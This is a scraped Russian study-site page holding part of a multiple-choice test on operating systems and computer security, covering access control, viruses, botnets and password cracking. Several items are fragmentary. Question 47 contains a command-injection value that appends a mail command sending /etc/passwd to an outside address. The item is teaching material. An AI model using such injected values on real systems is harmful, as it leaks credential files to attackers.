Студопедия

КАТЕГОРИИ:


Архитектура-(3434)Астрономия-(809)Биология-(7483)Биотехнологии-(1457)Военное дело-(14632)Высокие технологии-(1363)География-(913)Геология-(1438)Государство-(451)Демография-(1065)Дом-(47672)Журналистика и СМИ-(912)Изобретательство-(14524)Иностранные языки-(4268)Информатика-(17799)Искусство-(1338)История-(13644)Компьютеры-(11121)Косметика-(55)Кулинария-(373)Культура-(8427)Лингвистика-(374)Литература-(1642)Маркетинг-(23702)Математика-(16968)Машиностроение-(1700)Медицина-(12668)Менеджмент-(24684)Механика-(15423)Науковедение-(506)Образование-(11852)Охрана труда-(3308)Педагогика-(5571)Полиграфия-(1312)Политика-(7869)Право-(5454)Приборостроение-(1369)Программирование-(2801)Производство-(97182)Промышленность-(8706)Психология-(18388)Религия-(3217)Связь-(10668)Сельское хозяйство-(299)Социология-(6455)Спорт-(42831)Строительство-(4793)Торговля-(5050)Транспорт-(2929)Туризм-(1568)Физика-(3942)Философия-(17015)Финансы-(26596)Химия-(22929)Экология-(12095)Экономика-(9961)Электроника-(8441)Электротехника-(4623)Энергетика-(12629)Юриспруденция-(1492)Ядерная техника-(1748)

D. Однопрограммный




В. Мультипрограммный

В. Системных ресурсов компьютера

С. Отобраны у процесса

А. Наследование приоритетов

В. Клонирование пользователей

С. Пакетную обработку

D. Делегирование полномочий

 

38. К невыгружаемым относятся такие ресурсы, которые не могут быть …

А. Отобраны у процессора

В. Загружены в память

D. Выгружены из памяти

 

39. Интерфейс прикладного программирования предназначен для использования прикладными программами …

А. Адресного пространства процесса

С. Регистров общего назначения процессора

D. Интерпретатора команд пользователя

 

40. По режиму обработки задач различают операционные системы, обеспечивающие … режим (укажите не менее двух вариантов ответа)

А. Виртуальный

С. Многопользовательский

41. Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.

А. вызова утилит операционной системы

В. диспетчера приложений

С. вредоносных программ

D. подбора пароля

42. Недостаток систем шифрования с секретным ключом состоит в том, что… A) отправитель сообщения не может его расшифровать B) отправитель и получатель должны иметь общий секретный ключ C) объем вычислений при дешифровании намного больше, чем при шифровании D) объем вычислений при шифровании намного больше, чем при дешифровании 43. Объектами защиты в компьютерных системах могут быть …A) устройства отображения информации B) помещенияC) сотрудники D) программы 44. Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на... A) пользователей B) прикладную программу C) операционную систему D) руководителей подразделений 45. Защита зашифрованных паролей в UNIX взламывается путем … A) шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей B) привлечения инсайдеров в качестве сообщниковC) расшифровки всех паролей после копирования файла паролей D) вычисления пароля путем свертки идентификатора пользователя 46. Лазейки в программах создаются … A) для облегчения отладки программ или в противоправных целях B) только для противоправных целей C) для внедрения в программу постороннего кода D) только для облегчения отладки программ

 

 

47. Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?

А. Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.

В. Отправит файл aaa адресату goofinator@mail.ru.

С. Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.

D. Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

48. Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …A) организация сетевых азартных игр B) распространение пиратского контента C) рассылка коммерческого спама D) хищение денег с кредитных карт 49. Перезаписывающий вирус заражает исполняемую программу путем … A) записи кода вируса в тело зараженной программы после каждого ее вызова B) перезаписи содержимого стека программы кодом вирусаC) перезаписи служебных секторов дисков D) записи вируса на место кода программы 50. Обнаружить зашифрованный вирус можно... A) с помощью универсальной программы дешифрования B) по характерному поведению зараженной программы при запуске C) по сигнатурам кода процедур расшифровки вируса D) по изменению размера программы Вариант 2 Количество заданий: 50

1. Операционные системы представляют собой программные продукты, входящие в состав…[C4]

А. Прикладного программного обеспечения;

В. Системного программного обеспечения;

С.Системы управления базами данных;

D. Систем программирования;

 

2. Операционная среда использует функцию операционной системы…(возможно более одного ответа[C5])

А. Оптимизировать использование ресурсов

В. Являться виртуальной машиной




Поделиться с друзьями:


Дата добавления: 2015-06-26; Просмотров: 990; Нарушение авторских прав?; Мы поможем в написании вашей работы!


Нам важно ваше мнение! Был ли полезен опубликованный материал? Да | Нет



studopedia.su - Студопедия (2013 - 2024) год. Все материалы представленные на сайте исключительно с целью ознакомления читателями и не преследуют коммерческих целей или нарушение авторских прав! Последнее добавление




Генерация страницы за: 0.009 сек.